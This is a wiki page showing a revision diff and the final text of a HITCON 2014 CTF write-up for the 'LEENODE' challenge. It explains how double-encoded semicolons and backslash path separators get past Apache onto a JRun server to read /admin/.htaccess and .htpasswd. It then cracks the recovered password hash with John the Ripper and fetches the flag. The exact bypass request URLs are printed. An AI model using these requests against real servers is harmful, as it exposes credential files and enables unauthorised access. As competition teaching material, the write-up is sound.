ログイン
編集不可のページディスカッション情報添付ファイル
"CTF/Writeup/HITCON2014/LEENODE"の差分
MMA
1と2のリビジョン間の差分
2014-08-19 00:48:54時点のリビジョン1
サイズ: 1581
編集者: ytoku
コメント:
2014-08-19 00:55:29時点のリビジョン2
サイズ: 1586
編集者: ytoku
コメント:
削除された箇所はこのように表示されます。 追加された箇所はこのように表示されます。
行 3: 行 3:
 1. The server is Apache/2.0.65 (Unix) JRun/4.0 Server.
 1. *.jsp is redirected to JRun server.		  1. The server was Apache/2.0.65 (Unix) JRun/4.0 Server.
 1. *.jsp was redirected to JRun server.
行 6: 行 6:
 1. I found the vulnerability information of JRun  1. I found a vulnerability information of JRun
行 8: 行 8:
 1. [[http://203.66.57.98/a;.jsp]] is 500 Internal Server Error. It is interesting. by Apache?
 1. I tried to escape the URL for Apache; [[http://203.66.57.98/a%253b.jsp]] is /a and 404 Error by JRun. It is very interesting.
 1. Can I get .htaccess or /admin/.htaccess? [[http://203.66.57.98/.htaccess%253b.jsp]], [[http://203.66.57.98/admin/.htaccess%253b.jsp]]: Answer is no. These are blocked by Apache. We need more tricks.
 1. Then, I found that JRun recognizes backslash as directory separator (for Windows?). [[http://203.66.57.98/.%5Ca%253b.jsp]] is handled as /a by JRun.		  1. [[http://203.66.57.98/a;.jsp]] was 500 Internal Server Error. It is interesting. by Apache?
 1. I tried to escape the URL for Apache; [[http://203.66.57.98/a%253b.jsp]] was /a and 404 Error by JRun. It is very interesting.
 1. Can I get /.htaccess or /admin/.htaccess? [[http://203.66.57.98/.htaccess%253b.jsp]], [[http://203.66.57.98/admin/.htaccess%253b.jsp]]: Answer is no. These are blocked by Apache. We need more tricks.
 1. Then, I found that JRun recognized backslash as directory separator (for Windows?). [[http://203.66.57.98/.%5Ca%253b.jsp]] is handled as /a by JRun.
行 21: 行 21:
 1. Use John. the password is ktw2z. {{{  1. Use John. The password was ktw2z. {{{
行 26: 行 26:
 1. There is the flag on [[http://203.66.57.98/admin/thefl4g.txt]]. {{{  1. There was the flag on [[http://203.66.57.98/admin/thefl4g.txt]]. {{{

LEENODE

  1. Perhaps, what we need to do is to access to /admin/
  2. The server was Apache/2.0.65 (Unix) JRun/4.0 Server.
  3. *.jsp was redirected to JRun server.
  4. I found a vulnerability information of JRun

  5. http://203.66.57.98/a;.jsp was 500 Internal Server Error. It is interesting. by Apache?

  6. I tried to escape the URL for Apache; http://203.66.57.98/a%253b.jsp was /a and 404 Error by JRun. It is very interesting.

  7. Can I get /.htaccess or /admin/.htaccess? http://203.66.57.98/.htaccess%253b.jsp, http://203.66.57.98/admin/.htaccess%253b.jsp: Answer is no. These are blocked by Apache. We need more tricks.

  8. Then, I found that JRun recognized backslash as directory separator (for Windows?). http://203.66.57.98/.%5Ca%253b.jsp is handled as /a by JRun.

  9. Finally, I got the /admin/.htaccess via http://203.66.57.98/.%5Cadmin%5C.htaccess%253b.jsp and /admin/.htaccess via http://203.66.57.98/.%5Cadmin%5C.htaccess%253b.jsp. 

    AuthName "Restricted Area" 
AuthType Basic 
AuthUserFile /usr/local/apache2/htdocs/admin/.htpasswd 
AuthGroupFile /dev/null 
require valid-user
    hitc0n_1een0de:nlGc3XNhkrL1o

  10. Use John. The password was ktw2z. 

    % john htpasswd
ktw2z            (hitc0n_1een0de)
guesses: 1  time: 0:00:01:13 DONE (Sat Aug 16 20:58:25 2014)  c/s: 5319K  trying: ktkcK - kk4iT

  11. There was the flag on http://203.66.57.98/admin/thefl4g.txt. 

    The flag is HITCON{u_d0nt_f0rg3t_d0uble_3nc0ding!}

CTF/Writeup/HITCON2014/LEENODE (最終更新日時 2014-08-19 03:06:33 更新者 ytoku)